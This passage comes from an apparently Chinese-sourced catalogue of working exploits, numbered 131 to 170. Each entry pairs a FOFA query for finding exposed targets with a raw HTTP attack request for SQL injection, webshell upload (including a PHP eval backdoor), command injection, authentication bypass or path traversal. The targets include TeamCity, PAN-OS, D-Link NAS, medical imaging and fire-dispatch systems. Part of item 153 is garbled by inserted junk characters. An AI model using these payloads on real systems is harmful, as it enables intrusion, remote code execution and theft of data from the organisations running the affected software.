Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin/
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun Communication Command and Dispatch Platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun Communication Command and Dispatch Platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun Communication Command and Dispatch Platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun Communication Command and Dispatch Platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun Communication Command and Dispatch Management Platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio任意文件读取+ c/ h5 g' R3 c% A
CVE-2024-1561FOFA:body="__gradio_mode__"; V# p8 i  R# M) [* |+ p. p7 i
第一步,请求/config文件获取componets的id/ {" X+ g8 O+ `9 a8 H
http://x.x.x.x/config. M$ q& m  ~' Q  U* ?
7 R7 Y- s/ g: @
6 U% S7 s7 ?6 n$ s* `0 f6 e
第二步,将/etc/passwd的内容写入到一个临时文件8 ]& C9 ^: i& N: l- j: H
POST /component_server HTTP/1.1) k# R5 ^, c2 Y! \( D
Host: x.x.x.x2 W& D% \( d6 a: y1 y- H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
- O6 [# M4 e8 Y& h9 x3 D, eConnection: close4 r3 M2 N4 r# q- `! [% d! x; |
Content-Length: 1153 v6 [. z' T" K; Z) v
Content-Type: application/json+ T; o. m3 _5 l* G) B0 A
Accept-Encoding: gzip
& H. f% J1 W1 F- i7 N5 d# L
% ~- I6 I+ }5 _5 Z+ g{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}! v0 k& X5 i6 Z# E9 J

1 f2 C, H' q3 f' N1 C
3 h1 x4 j3 u$ K+ x第三步访问4 b3 P1 ~3 s+ q, l; [
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd, X' F5 G- @' r+ y; C7 W5 G4 k

, d/ i, g" G4 x" j# S/ s) z+ i/ i5 V
+ P6 d* \/ Q) B; f154. 天维尔消防救援作战调度平台 SQL注入
/ S2 ~4 H" n8 i" c$ hCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
2 m  `9 U: A2 f# t  @POST /twms-service-mfs/mfsNotice/page HTTP/1.18 }3 F( C/ M! d. u
Host: x.x.x.x* j1 n- o4 s* E& n# U& l+ O$ g# e& N
Content-Length: 1064 _+ {" y* m; j+ e& ^: b8 l
Cache-Control: max-age=0. @. h, H+ i' a/ Y+ R5 g
Upgrade-Insecure-Requests: 1
4 j( C+ Z) o4 H: `+ ]) c, DOrigin: http://x.x.x.x
" h$ J# i9 ?0 u9 PContent-Type: application/json8 n2 R/ |. ~: [7 {. w0 ]6 t7 F9 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
- U2 p1 n6 z0 ]/ Z" Y% ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ j7 m; v$ A" y: Z
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page$ s" s: V, Y6 _- ^3 @, L" `
Accept-Encoding: gzip, deflate
/ e$ y  h) d3 Q* h/ o% FAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
* `/ c  E0 Q! C# t' HConnection: close; C& h/ D# @: L! @& y
  G2 l3 L2 B% X& Y2 P$ C, v- R
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}7 P' [& m& r  `3 T: s* ~
$ Z# V  v5 y; S7 W4 @

# f1 ?: {6 A2 t1 z- y( ?: [155. 六零导航页 file.php 任意文件上传
/ z5 k( p! e0 z- U# eCVE-2024-34982
( K2 u* I8 m! g1 V* j0 ]$ PFOFA:title=="上网导航 - LyLme Spage"
( E" |5 }9 D* S4 {% qPOST /include/file.php HTTP/1.1! d4 a5 \& K: m
Host: x.x.x.x$ Q3 q$ L0 U. Q) z9 S0 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 i% h. V$ d, t0 l6 W7 Z; l# IConnection: close1 @* d$ G- l. G9 b7 b# I
Content-Length: 232
; {& V# q3 ~% g& k& t% U; l( @Accept: application/json, text/javascript, */*; q=0.01
- N& }# B& a/ V8 N, i* VAccept-Encoding: gzip, deflate, br
, j- O; y2 Z' X5 ~! w+ \+ RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 T  w3 C3 |+ P/ }
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
( T, E) n5 ^7 @1 wX-Requested-With: XMLHttpRequest* W1 W( y& }/ e8 I
3 x$ g! c9 E& V: ]' U
-----------------------------qttl7vemrsold314zg0f6 W1 M% e' \2 k0 k, g; x
Content-Disposition: form-data; name="file"; filename="test.php". i) v. j% g0 H6 I' l4 O% |0 G5 s
Content-Type: image/png
) F1 l* R( W$ w& e3 V* Z7 D3 b1 X! c% g0 m* }
<?php phpinfo();unlink(__FILE__);?>
$ I9 r! \0 s& Y' f-----------------------------qttl7vemrsold314zg0f--
9 f9 _: J3 u+ x3 L( p& g4 Y- b# o- a! S# c; [
- d( r/ h& L5 @
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php! J1 L! q. r( l5 B) o5 Q* I! M

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>


http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
